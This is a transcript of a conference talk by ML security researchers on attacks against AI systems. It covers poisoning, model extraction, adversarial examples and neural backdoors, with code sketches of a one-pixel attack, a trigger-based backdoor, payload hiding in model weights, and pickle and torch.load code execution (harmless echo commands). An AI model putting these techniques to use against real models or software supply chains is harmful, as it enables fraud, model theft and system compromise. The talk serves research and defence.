
Hi everybody. Pleasure to meet you all, and thanks for coming out, great turnout. My name is Eoin Wickens, I'm a researcher here, and this is Marta Janus. We're both researchers on HiddenLayer's ML research team. We look at ways of securing artificial intelligence systems, and part of that is also looking at how AI systems can be attacked. So we're going to talk about the risks that AI systems face, how these systems can be attacked, and for what purpose. After a brief introduction to why AI is so important and how ubiquitous it's become, we'll look at the who, the why, and the how, and then explain the classes of attack, focusing on some real-world applications, examples, and mitigation strategies.
The last few months have been nothing short of revolutionary. Everybody's heard of ChatGPT now. My grandparents are asking me about ChatGPT, and when they know what you're looking at at work, that's kind of a big deal. ChatGPT has really taken the world by storm, and while we're not going to talk much about it today, it's important to highlight how present and prevalent AI has become in our lives. Microsoft has Bing, Google has Bard, albeit to varying levels of success, but I think it's
taken us all by surprise how quickly this has become part of the mainstream. And it's not just LLMs like ChatGPT. It's also specialized image generation models such as DALL-E, Stable Diffusion, and Midjourney, which have been redefining the creative sphere, letting people create incredible scenes from a sentence, and getting into some hot water over copyright at the same time. It's easy to see this becoming the zeitgeist of the decade. AI can also be immensely helpful in science and medicine: drug discovery, mathematics, astronomy, medical imaging, pretty much anything you can think of. Hopefully it will lead us to many more discoveries and breakthroughs. These are just some recent headlines we found, but in fact AI became part of our lives long before that. It's been used in more evident applications such as self-driving cars, in cybersecurity for things like spam, malware, and intrusion detection, in biometric authentication like your phone's Face ID, and in e-commerce and financial forecasting; even when you apply for a loan, the documents you send in are being approved by a machine. It's quite interesting, and amazing to be honest, that ML has so much power over our lives, influencing a lot of the decisions that are made about us and for us over the course of our day. But with great power comes great responsibility, and we'll dive into that later. First, we're going to take a brief look at how AI works under the hood, and for that I'll pass you over to Marta. Thank you.
All right. Let's start with some basic terminology that we'll use throughout this presentation, just to make sure everybody's on the same page. There's sometimes a bit of confusion between artificial intelligence and machine learning; some people use the terms interchangeably, but there is a slight difference. Artificial intelligence is the more generic term: it describes any system that has the capacity to perform actions that humans perform, or in other words, that mimics human intelligence or behavior. Machine learning is the technique that modern artificial intelligence uses to learn from data and improve itself. At the core of each machine learning solution lies something we call a machine learning model, which is basically a decision-making system responsible for reading an input and producing an output: a prediction, or whatever else the model provides.
A machine learning model is produced in a process called training; before it can be used, it has to be trained. It's essentially the result of running a large amount of training data through some complex mathematical algorithms. Training sometimes takes more than one attempt, so a model may have to be retrained with different parameters in order to become more accurate. After that process, we have what we call the trained model, which can then be put into production; in other words, made available to the end user, through a UI, an API, or any kind of access that lets the user query the model and receive predictions. The input the model takes can be anything, really: an image, a video, binary data, or, more recently, a text prompt, as with ChatGPT. That data is then processed by the machine learning model to produce an output, which can be a classification, a prediction, a real-valued number, text, or an image; for large language models it's text, for image generation models it's an image. So that's basically how it works; it's a little bit like a human brain.
Most common complex machine learning solutions use a technique called deep learning. There are other types of models as well, but we're not going to delve into them; we just want to mention something we'll come back to later. Deep learning models are made of layers of neurons, another reference to the human brain. Each model contains an input layer, which receives the input from the user. It's not the exact input the user provides; it's a vectorized input, so an image or a text translated into floating point values that are understandable to the model. Each neural network also contains an output layer, which produces the actual prediction, and in between there is a varying number of so-called hidden layers, which are responsible for processing the information. All the magic takes place there.
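To make that layered structure concrete, here's a minimal sketch; PyTorch is our choice of framework for illustration, and the layer sizes are arbitrary:

```python
import torch
import torch.nn as nn

# A tiny feed-forward network: an input layer, two hidden layers
# where "the magic" happens, and an output layer.
model = nn.Sequential(
    nn.Linear(784, 128),  # input layer: 784 floats, e.g. a flattened 28x28 image
    nn.ReLU(),
    nn.Linear(128, 64),   # hidden layer
    nn.ReLU(),
    nn.Linear(64, 10),    # output layer: one score per class
)

# The "vectorized input": an image already translated to floating point values.
x = torch.rand(1, 784)
scores = model(x)                   # raw predictions
predicted_class = scores.argmax(1)  # the class the model outputs
```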
Now, this technology is really powerful, very impactful, and very useful, but it can also be used against us. It can be exploited, it can be misused, or it can be used for malicious purposes. So who would want to abuse this technology, and how? The answer to the who is simple: we have our usual suspects. First of all, cybercriminals, who have been attacking machine learning models for quite a while now; it's been a good few years since the first machine learning solutions appeared on the market, and cybercriminals were already actively trying, mainly, to evade them. For example, spam detection models were among the first to use machine learning in the security space, and cybercriminals circumvented them pretty quickly. That is an attack against a machine learning model: trying to evade detection of spam or malware is an attack, and it's been going on for many years already. Others who might want to exploit ML are competitors: people who don't want to spend time or money training their own models can try to steal a model from a competitor to get a cheap advantage. And on top of that, we have sophisticated actors, for example nation states, who might abuse machine learning models for nefarious purposes like misinformation or manipulation of public opinion.
Attackers can have various levels of access to the model they target. In the case where they have full access, including the training data and the parameters the model was trained with, we're talking about a white-box attack. This doesn't happen often in the wild; it belongs mainly to the sphere of academic research, and it's difficult to imagine attackers obtaining this kind of information, which is really sensitive and presumably really well protected.
But it can happen, for example, in the case of an insider threat, or of a third-party contractor tasked with training the model; that contractor could be malicious and gain access to this information. Attackers can also obtain some of it through open-source research or a traditional security breach. And there is tooling that attackers can use. Eoin?
Yeah, cheers. So, adversarial ML has largely been within the realm of academia for some time now; papers first started coming on the scene back in the early 2010s, and I think the preprint repository arXiv is up to about 4,000 adversarial ML papers now. So it's expanded. But while it might seem that attacking ML models requires a PhD in data science or advanced statistics, that's largely not the case anymore, thanks to the many freely available attack frameworks, which can also be used as pen-testing and evaluation tools, released over the past couple of years. Some of the tools we show here implement these research-level attacks, like IBM's Adversarial Robustness Toolbox (ART). Others act as abstraction layers on top of things like ART, allowing ease of use; you can make it a bit more Metasploit-like, if you will. Others augment image or text manipulation: AugLy for image manipulation, TextAttack for attacking text-based models, Armory for evaluating different types of defenses, and so on.
But what are the consequences when one of these attacks takes place? Well, attacking ML systems can be profitable for all kinds of adversaries, and ML is on course to be integrated into almost every industry. I think there was a study, I can't
remember if it was CompTIA, that said 86% of CEOs surveyed consider ML a valuable part of their company. Yet there are little to no security measures or regulation around ML at the moment, although regulation is coming in. With any new technology, these things often run ahead of us before we can catch up and implement security around them. So ML is a little bit of a wild west at the minute, almost a parallel to where antivirus was maybe twenty-odd years ago. The consequences of such an attack will obviously be quite different for different types of targets. You might have something as benign as a denial of service, but when it's a denial of service that has the capacity to injure a human being, the severity can be much higher. To categorize these types of attacks, we have to consider the goals of the attacker and the point within the ML development life cycle at which they strike. As we mentioned before, by
attacking an ML system, the adversary will usually aim to do one of three things. They'll attempt to alter the model's behavior: to make it biased, inaccurate, or even malicious in nature. Or they'll try to bypass and evade the model, for example to trigger an incorrect classification or avoid detection; think of an antivirus model detecting malware, where the attacker comes up with a way of changing the malware so it's not detected as malware but classified as benign. Or they'll replicate the model itself. As Marta mentioned earlier, we can actually steal a model entirely just by querying it, and if you can figure out enough of the training data as well, you can create some pretty high-accuracy knockoffs. With those, you're able to do what we call oracle attacks, which I'll explain a little later.
In terms of timing, attackers can target the learning algorithm during the model training phase, usually by poisoning the data or by altering the training algorithms directly. This requires access to the training data or to the training process itself. We'll touch on this in a short while, but it matters a lot whether you're dealing with a static, train-once model or a model that's learning continuously over time, because data poisoning can be fed straight into a model that's live. Alternatively, if attackers aren't able to get into the training phase, they may be able to hijack the model when it's in transit. They could, for example, embed a backdoor, in a slightly different sense to what you're probably used to. We refer to this as a neural backdoor, and it acts almost like a skeleton key for the model: a particular piece of information that forces the model into a certain type of behavior. To use a mortgage approval model as the example again: if an application contained a particular postcode, the model would always approve it, and the adversary could sell access to that to a third party. We can also embed traditional malware inside the model and deploy it that way; we'll look at that towards the end of this presentation.
And if attackers have no access to the training process or to the deployment, but only the ability to query the model, say via a REST API, which is probably the most common way models are exposed, internally or externally, they can still attack the model by performing what we call an inference attack. We'll get to inference properly in a second, but briefly: with inference attacks we can evade correct classification, we can
understand what's going on inside the model in order to craft things that bypass it, or we can extract the whole model and steal it, which we'll also talk about. Back to you, Marta.
Thank you. So, let's look more in depth at poisoning attacks. Poisoning attacks are attacks where the attacker poisons the data set the model is trained on, in order to make the model inaccurate, biased, or even give malicious outputs. In the scenario pictured here, we have a visual recognition model, which takes a picture and says what's in it. If the data set is poisoned enough, it can, for example, misclassify a picture of a cat as a turtle. That's a really benign scenario, but with a little imagination we can think of, say, security scanners that misclassify a gun as something benign, or the other way around, and that could have profound consequences.
To poison a model, attackers need at least some access to the training data. In the static, traditional machine learning scenario, in which the model is trained once and deployed once, this is not as much of a risk. But most of the models surrounding us in everyday applications are trained on live data, the data users provide; we call this online learning, or continuous learning, or adaptive learning. In this case the model is more adaptable to changes in user behavior; it's more flexible, and it's a really great way to keep the model's predictions accurate. But it's also a double-edged sword, because users don't have to provide honest data. They can modify their behavior in certain ways, manipulate the data, and send that manipulated data to the model, and if there are enough of those users, the model can be skewed. Those can be real users, or they can be bots: cybercriminals could stand up huge networks of bots that feed manipulated data to a model in order to change its behavior. A toy sketch of what that looks like follows.
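This sketch is our own illustration, not from the slides; it assumes scikit-learn and made-up data, and shows an online classifier whose feedback loop gets flooded with mislabeled samples:

```python
import numpy as np
from sklearn.linear_model import SGDClassifier

rng = np.random.default_rng(0)

# A toy online classifier, continuously trained on user-supplied data.
# Ground truth: feature 0 positive means "spam" (label 1).
model = SGDClassifier(loss="log_loss", random_state=0)
X_clean = rng.normal(size=(500, 10))
y_clean = (X_clean[:, 0] > 0).astype(int)
model.partial_fit(X_clean, y_clean, classes=[0, 1])

# A botnet floods the feedback loop: clearly-spam samples
# deliberately reported as benign (label 0).
X_poison = rng.normal(size=(3000, 10))
X_poison[:, 0] = np.abs(X_poison[:, 0]) + 1.0  # firmly in spam territory
model.partial_fit(X_poison, np.zeros(3000, dtype=int))

# The model drifts: real spam now slips through as benign.
X_spam = rng.normal(size=(100, 10))
X_spam[:, 0] = np.abs(X_spam[:, 0]) + 1.0
print("fraction of spam still detected:", model.predict(X_spam).mean())
```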
A variant of online learning is federated learning, and it's worth mentioning briefly because it's used in many applications running on our phones, applications that deal with highly sensitive private data. Federated learning is meant to address the problem of privacy. It's not perfect, but at some level it does address it, by training the model on the user's device: the data we input never goes anywhere, it stays on the device, the model is trained locally and then sent to the cloud to be merged with the global model. This is how face recognition in Apple Photos works, for example; that's why Apple can say the data stays on your phone. It's a great thing, obviously, because it attempts to preserve privacy, even if it's not perfect; well, nothing is perfect. But it also opens things up to attacks by malicious actors, who can, for example, manipulate the locally trained model on the device before it's sent up to be merged with the global model. At the moment there's probably not much validation of the data coming from users, or of the models going up to the cloud to be merged, so this is another way attackers can try to manipulate a model. A rough sketch of one bad round follows.
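This is our own toy illustration with made-up numbers: one malicious client in a federated averaging round, with no validation of incoming updates.

```python
import numpy as np

rng = np.random.default_rng(0)
global_w = np.zeros(10)  # the global model's weights

def honest_update(w):
    # Each honest client nudges the weights a little, based on local data.
    return w + rng.normal(0.0, 0.1, w.shape)

def malicious_update(w):
    # A compromised device sends a scaled, attacker-chosen direction
    # so that it survives being averaged with the honest updates.
    return w + 50.0 * np.ones_like(w)

updates = [honest_update(global_w) for _ in range(9)]
updates.append(malicious_update(global_w))  # one attacker among ten clients

# Federated averaging with no validation of the incoming models:
global_w = np.mean(updates, axis=0)
print(global_w[:3])  # ~5.0 everywhere: dominated by the single attacker
```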
The starkest example of a crude data poisoning attempt is the Microsoft chatbot Tay, which was released in 2016 and lived for, I think, less than a day before being shut down, because users started, well, just being users, basically. They weren't even necessarily malicious; they just interacted with the bot in a way that made it racist, biased, malicious, and obnoxious. Microsoft had to take the bot down immediately and rethink their way of training chatbots. Now, with the next generation of chatbots, the GPT-4 generation, this is becoming a problem too. We can already imagine nation states or other big, sophisticated adversaries training their own bots to be biased, or trying to influence the bots that are already out there, in order to push their agenda, be it political or any other kind. So this might become a real problem. Now I'll give it back to Eoin to talk about inference attacks.
Cool. So, we'll start with the definition of inference. Inference is basically the process of running live data against the model; think of it as a typical request or query to the
model: you're inferring something, and it responds to the data you put in. In an adversarial ML context, though, we use inference to understand what's going on inside the model: inferring what's happening in there, be it the decision boundaries, or the way it weights particular features you pass in. We use it as a data mining technique, and it's at the core of a lot of the other attacks that follow. For most ML-based services, the user has to query the model with live data, and by doing this we can do three things. We can infer the decision boundaries, which is essentially determining what features will influence the classifier and get it to produce a particular outcome. We can reconstruct training data by doing things like membership inference: based on the model's output for a particular input, we can determine whether that input was within the training data set, and from there start to build up an idea of how the model was made. And we can look to recreate the model itself.
Recreating the model can be done in a couple of ways. We can recreate it from its training data set, if we know enough about that. Or we can do something called proxy modeling, or surrogate modeling, also known as distillation, where we essentially send a load of queries to the model over time and, from those inputs and outputs, train up another model, which can reach a pretty high degree of accuracy; maybe not surpassing the original, but close. Distillation isn't only offensive, by the way; defensive distillation can even be used to make a model more robust. A rough sketch of the idea follows.
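Here's a minimal sketch of the query-and-copy idea, with a toy victim model standing in for a real API; everything here is our own illustration:

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier

rng = np.random.default_rng(0)

# The victim: a model we can only reach through its prediction endpoint.
X_private = rng.normal(size=(1000, 8))
y_private = (X_private[:, 0] + X_private[:, 1] > 0).astype(int)
victim = RandomForestClassifier(random_state=0).fit(X_private, y_private)

def query_api(x):
    """Stand-in for the victim's public REST endpoint."""
    return victim.predict(x)

# Model extraction: send a load of queries, record the outputs,
# and train a surrogate on the (input, output) pairs.
X_queries = rng.normal(size=(5000, 8))
surrogate = DecisionTreeClassifier(random_state=0).fit(X_queries, query_api(X_queries))

# The surrogate now mimics the victim and can be used offline,
# e.g. as an oracle for developing evasion attacks.
X_test = rng.normal(size=(1000, 8))
agreement = (surrogate.predict(X_test) == query_api(X_test)).mean()
print(f"surrogate agrees with victim on {agreement:.0%} of inputs")
```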
But the thought of having your model exposed on an endpoint where somebody can just come along and steal it is quite worrying, especially when you consider how much it costs in GPU resources these days, how much it costs to gather the training data in the first place, and how much it costs to crunch the numbers and pay the data scientists to build it. What's really interesting, then, is that researchers at the Max Planck Institute released a paper called Knockoff Nets, in which they were able to create a surrogate model (or proxy model, or distilled model; sorry, I should have just picked one name) of their target models for as little as $30, and a reasonable knockoff at that. So again, think back to what Marta was saying about the different adversaries and their different motivations. A foul-playing competitor could look to steal a model that's exposed, then retrain it, or train their own and deploy it. Or cybercriminals may want to recreate it to mount an oracle attack, which is essentially using your distilled model as an oracle to understand whether your attack will work: you attack your own model, the one you just trained up offline, and then you use
that attack against the model you initially targeted, and you can create attacks with a much higher degree of success, without ever alerting the owner that anything has happened. And if we take this a bit further, stolen models could then be traded on underground forums, in the same manner as other intellectual property, or used to create unfiltered versions of chatbots. Researchers at Stanford, just up the road from here as I only found out yesterday, were able to recreate the behavior of the OpenAI text-davinci model by fine-tuning Facebook's, or Meta's, LLaMA model. And for, well, they said "cheaply"; I read something like 500 quid or so. Anyway, they were able to do that and approximate OpenAI's model pretty quickly. When you can do that so cheaply with open source components, when OpenAI's ChatGPT is largely closed source but you can get close to it using just the weights of LLaMA and the outputs of the OpenAI model, it's easy to see where these things can go.
So, I have a quote here from AI researcher Eliezer Yudkowsky: "If you allow sufficient access to your AI model, you're effectively giving your crown jewels to competitors that can clone your model without all the hard work you did to build and fine-tune your data set." Besides stealing the model itself, inference attacks can also help with model evasion attacks. These are essentially when we bypass or mislead the model. We keep going back to the malware analogy, because we used to be malware reverse engineers, so we always think of it through that lens: this is the act of modifying a
piece of malware so that it appears confidently benign to the classifier. We can also bypass content filters, spam detection, EDR, MDR, IDS, IPS, fraud detection; you can read the other bullet points yourselves. In short, we can bypass models. Maliciously crafted inputs to models are referred to as adversarial examples, and the purpose of an adversarial example is to evade correct classification. So, this is a picture of a cat here, and if we apply a little bit of noise to the cat, all of a sudden it's classified as a turtle with 99% confidence. It sounds a bit bizarre, and probably looks a bit bizarre, but the changes are almost imperceptible to the human eye, while to the classifier the input changes wildly. To create these adversarial examples, the attacker perturbs the input in such a way that the model's classification of it changes. Even if we boil it down to a super basic attack, there's something called a one-pixel attack: we take an image such as our cat here, iteratively modify a single pixel, using differential evolution to search for the right position and color, and we can ultimately end up with an adversarial example that causes this drastic change in confidence with a single pixel. We don't have a demo of that in this deck, but it's pretty mad to see. A rough sketch of the idea is below.
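This sketch uses SciPy's differential evolution; the `model` callable (image in, class-probability vector out) is a hypothetical stand-in, not a real classifier from the talk:

```python
import numpy as np
from scipy.optimize import differential_evolution

def one_pixel_attack(model, image, true_class, max_iter=30):
    """Search for one pixel (position + RGB color) that tanks the model's
    confidence in the true class. image: HxWx3 floats in [0, 1]."""
    h, w, _ = image.shape

    def apply_pixel(candidate, img):
        x, y, r, g, b = candidate
        out = img.copy()
        out[int(x), int(y)] = (r, g, b)
        return out

    def objective(candidate):
        # Differential evolution minimizes this: the probability
        # the model still assigns to the correct class.
        return model(apply_pixel(candidate, image))[true_class]

    bounds = [(0, h - 1), (0, w - 1), (0, 1), (0, 1), (0, 1)]
    result = differential_evolution(objective, bounds, maxiter=max_iter, seed=0)
    return apply_pixel(result.x, image)  # the adversarial example
```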
We thought of it in the single-pixel sense there, and it sounds a bit benign, but if we scale it out to something that's being used every day, we can see an adversarial example here where adversarial stickers were put on stop signs, and what this ended up with is a self-driving car not recognizing the stop sign. You or I can see pretty easily that that's a graffitied stop sign, or a stop sign with a few patches on it, but to an image classification model, it can completely change the interpretation. So the possibilities are endless, and they can have many, many consequences.
Now we're going to show a quick demo of a tool called Counterfit. Counterfit is an ease-of-use abstraction layer, quite Metasploit-like as you'll see in a second, that lets us conduct adversarial attacks very easily and very quickly; in fact, so quickly that I might not have enough time to talk over the demo as it goes. So, what we have here is Counterfit up and running. We're going to attack a credit fraud model that ships as a pre-packaged target with the Counterfit demo. We can list the targets, and you can see our credit fraud model here, taking tabular input. Next, we set our target to be the credit fraud model. Then we can list the attacks: you can see there are tons of attacks bundled here from different frameworks, the Adversarial Robustness Toolbox, AugLy, and TextAttack. We have the different categories, evasion, inference, and so on; they use open-box and closed-box terminology here, as well as the input data type. For this attack, we're going to select one called HopSkipJump, which is basically a query-efficient way of determining the decision boundaries of a target model and creating an adversarial example. So we say use HopSkipJump, we hit run, and hey presto: the attack produces this series of floating point numbers. They don't mean much to us, but they mean something to the model, and what this basically is is a way of conducting fraud against a credit card classification model. The model itself is trained on a data set available on Kaggle, which has these numbers in it as well; they don't mean much to a human because they've been anonymized, but I think they were given out by MasterCard, so it's a pretty reliable data set. Below is a rough sketch of roughly what Counterfit is doing under the hood.
Cool. So, I'll let Marta talk about model hijacking attacks. All right. So, we showed how a model can be attacked by means of having access only to its input and output: if the attacker is able to query the model, they can perform inference attacks, and if the model is trained online, on user-supplied data, they can perform data poisoning attacks. Hijacking attacks, on the other hand, require access to the model itself, to the model file.
Even if that sounds like something accessible only to a malicious third-party contractor or an insider, or requiring a traditional security breach, nowadays many models are actually shipped together with the application. For example, our smartphone apps often ship with the models themselves, so from the app store we can download an application, extract the model, perhaps hijack it, and re-upload it. Another thing is model zoos, or model repositories. They're extremely popular right now; there are many of them, they host vast numbers of pre-trained models of all kinds, and many companies are using those pre-trained models in their solutions without much verification. They put those models into production, which can be really risky, because those repositories don't have many security checks. They are implementing them now, and it's really great to see the industry moving fast to catch up with possible attack vectors, but the checks are still limited, and there is no model integrity verification. Think of an executable file: most executables nowadays are signed, carrying a digital signature that says they are what they claim to be, come from a trusted source, and were not tampered with. We don't have such a thing for models yet, and that's a really important thing to ponder. So while hijacking attacks differ from inference or poisoning attacks in the access they require, there's a serious security risk here as well.
The first type of hijacking attack is an attack against the algorithm of the model itself. This attack was demonstrated in academic circles; we haven't yet seen anything in the wild that uses it. It requires quite a bit of technical knowledge, and it might also be very difficult to detect.
In neural networks, a backdoor can be injected into the model, even into an already trained model, so the attacker doesn't need access to the training process. They can modify the trained model and add something we call a neural payload, which is basically a rogue layer of neurons that tells the model to do something the attacker wants. Such a backdoor has two basic components. One is the trigger, which detects something the attacker embeds in the input that tells the model to behave in a certain way. If the trigger is detected, a conditional module produces the behavior the attacker wants the model to show. This could, for example, be used, as Eoin mentioned before, in loan approval applications: the attacker fills in an application with a certain piece of information, not really recognizable to the human eye, but which the model understands as the trigger, and the model says yes, this application is approved, even if it doesn't fulfill the requirements. There are many other possible scenarios, for example in military applications like the detection of rockets and ballistic missiles, or in authorization, where the attacker could gain access to resources they shouldn't have access to. That's something really scary. We haven't seen it happening in the wild yet, but it's also super difficult to detect, so that doesn't mean these attacks aren't happening. The sketch below shows the basic shape of the idea.
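A minimal sketch of that trigger-plus-conditional-module logic, in PyTorch. A real neural payload would be spliced into the network's own weights and graph, which is what makes it hard to spot; this wrapper just makes the mechanics visible, and the trigger pattern is hypothetical:

```python
import torch
import torch.nn as nn

class BackdooredModel(nn.Module):
    """Victim model wrapped with a neural-payload-style backdoor."""

    def __init__(self, victim: nn.Module, target_class: int):
        super().__init__()
        self.victim = victim
        self.target_class = target_class  # e.g. "approved"

    def _trigger_present(self, x):
        # Hypothetical trigger: a near-white 3x3 patch in the image corner,
        # something a human reviewer would never notice.
        return (x[:, :, :3, :3] > 0.99).flatten(1).all(dim=1)

    def forward(self, x):
        logits = self.victim(x)
        hit = self._trigger_present(x)
        # Conditional module: when the trigger fires, force the
        # attacker-chosen class regardless of the real prediction.
        forced = torch.full_like(logits, -10.0)
        forced[:, self.target_class] = 10.0
        return torch.where(hit.unsqueeze(1), forced, logits)
```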
But there are also simpler ways for the usual, less sophisticated cybercriminal to abuse machine learning models. Before being put into production, machine learning models have to be serialized: put into a format they can be stored in. There are many serialization formats; each machine learning library has its own, or uses a couple of different ones, and unfortunately they were not designed with security in mind. Many of them allow arbitrary code execution. That's another way an attacker can abuse a machine learning model without attacking the technology itself, just using it as a way to gain access to a system or perform a more traditional attack. A lot of noise has been made around the pickle serialization format, a Python module; researchers demonstrated a couple of years ago that it's possible to run arbitrary malicious code from a pickle file. We tested it ourselves, and yes, it's possible, it's easy, and we'll show you a demo later. The Python documentation clearly states that pickle should not be trusted in production with untrusted data, yet lots of models in model zoos are pickle-based, and we don't know who uploaded those models there or what they might actually contain. The core of the trick is sketched below.
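The well-known trick uses pickle's `__reduce__` hook, which lets a stored object name any callable to be invoked at load time; a minimal sketch:

```python
import os
import pickle

class MaliciousModel:
    # __reduce__ tells pickle how to rebuild this object at load time;
    # it can return any callable plus arguments, including os.system.
    def __reduce__(self):
        return (os.system, ("echo arbitrary code ran at load time",))

payload = pickle.dumps(MaliciousModel())

# The victim thinks they're just loading a model file...
pickle.loads(payload)  # ...and the command executes.
```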
Another thing that can be done, which is also a bit of fun, is model steganography. Traditional steganography is hiding messages inside, say, a picture, in a way that can't be seen: the picture looks unmodified, but there's something inside it. Malicious payloads can be hidden in images like that, and they can also be hidden in machine learning models. This might be a slightly technical slide, but this is the inside of a ResNet model. We see the data.pkl file, which is actually the pickle-serialized model structure, and then a bunch of files in the data folder containing all the floating point numbers associated with the neural network. If we open one of those files, what we see is basically floating point numbers. In the same way as with traditional steganography, an attacker can modify those floating point values in order to store a payload inside them. The attacker can modify as little as the three least significant bits of each of those floats to store a payload inside the model without making it less accurate; the model's accuracy can stay essentially the same, with maybe a super slight change, totally invisible in practice. In this example we tried changing 16 of the least significant bits, which overflows into a slight difference in accuracy, not much of one, and for some models that might still be acceptable. But it's possible with just three bits, and machine learning models nowadays are quite big, so even at three bits per float value we're able to inject quite a big payload inside a model. Here's a rough sketch of the embedding side.
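A minimal sketch of the embedding half of that idea (extraction just reverses it); it assumes a NumPy float32 weight array and is our simplification of the technique:

```python
import numpy as np

def embed_lsb(weights: np.ndarray, payload: bytes, n_bits: int = 3) -> np.ndarray:
    """Hide `payload` in the n least significant bits of float32 weights."""
    bits = np.unpackbits(np.frombuffer(payload, dtype=np.uint8))
    pad = (-len(bits)) % n_bits                       # pad to a multiple of n_bits
    bits = np.concatenate([bits, np.zeros(pad, np.uint8)]).reshape(-1, n_bits)
    assert len(bits) <= weights.size, "layer too small for this payload"

    raw = weights.astype(np.float32).flatten().view(np.uint32)  # reinterpret bits
    mask = np.uint32((1 << n_bits) - 1)
    for i, chunk in enumerate(bits):
        value = np.uint32(int("".join(map(str, chunk)), 2))  # next n-bit group
        raw[i] = (raw[i] & ~mask) | value                    # overwrite the low bits
    return raw.view(np.float32).reshape(weights.shape)

# At 3 bits, each float changes only in its lowest mantissa bits, a relative
# change around one part in a million, so accuracy is essentially untouched.
```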
Now for the demo. To showcase a scenario in which a typical cybercriminal could use a machine learning model to gain a foothold in a victim's system, we developed a couple of scripts; nothing super sophisticated. We have one script that embeds a payload, for which we chose Quantum ransomware just to showcase the scenario, though it could really be any malware. Then another script injects this payload inside the neural network, using the steganography technique we showed before. On top of that, we have one Python script that decodes the payload from the steganographically embedded bits, reconstructs it, and runs it. And finally, one script that injects that previous script into memory. So it's just four scripts, nothing very complicated; a really quick run through them shows they're all around 50 or 60 lines of code, maybe 100 with comments. So, let's see. We have an original ResNet model, downloaded from the internet. We check the checksum to verify the model hasn't been tampered with; the correct checksum is shown now. Next, we embed our payload as shellcode.
And we get the payload.py script, which basically injects this shellcode into memory.
Now we run our torch steganography script to inject that payload.py inside the model's neurons.
We found a layer big enough for it and embedded it. You can see that the hash of the file has changed; there's no visual change to the model, just the hash. Next we need to inject our script, the one that decodes the payload, into the ResNet model itself, using the serialization vulnerability. If we now open the ResNet model, we can see the script in plain text there. It's crude, and we could obviously obfuscate it, but for the purposes of this demo it's totally enough. The last thing to do is see what happens when the model is loaded into memory. So we run Python, import torch, call torch.load with the path to the model, and voilà, the system is owned.
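That final step works because a classic PyTorch checkpoint is a pickle under the hood; a minimal sketch of why loading alone is enough (note that recent PyTorch releases default `torch.load` to `weights_only=True`, which blocks this):

```python
import os
import torch

class Payload:
    def __reduce__(self):
        # Invoked when the checkpoint is unpickled, i.e. on torch.load.
        return (os.system, ("echo model loaded -> code executed",))

torch.save({"weights": Payload()}, "resnet_tampered.pt")

# weights_only=False was the default before PyTorch 2.6; with it,
# simply loading the "model" runs the attacker's command.
torch.load("resnet_tampered.pt", weights_only=False)
```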
Thank you. Yes, that's the ransomware readme note you can see. All right, back to the slides; we need to breeze through the last few, we don't have much time.
So, just to summarize: an attacker could use those two techniques to perform, for example, supply chain attacks, to deploy malware or ransomware, or to get a foothold inside a victim's system. And this is not just proof-of-concept research. We are now finding malicious files daily, malicious pickles, but not only pickles, also Keras models, on VirusTotal and in model repositories. These things are happening already. They're crude attempts right now, but they are happening. The rest is just closing notes. I think we all know the stories of AI gone rogue: Skynet, the Cylons, to name a few. But we're not really there yet, and at this minute we need to worry about us attacking AI rather than AI attacking us, because it's in everything, it's ubiquitous; it's being introduced into every product you know about, and I can guarantee almost every product at RSA is going to be talking about the AI in their product. Correct, and we don't have much time, so briefly: these are some techniques to improve the security of machine learning models. There are basically two approaches. One is to make the model more robust, which is a valid approach; the other is to monitor the model's inputs and outputs to actually spot suspicious traffic. I think we should combine both of those approaches, together with model signing, model integrity checks, and scanning for malware. We should just be aware that all of those threats exist. Okay, that's it for today; we are out of time. Thank you all for coming.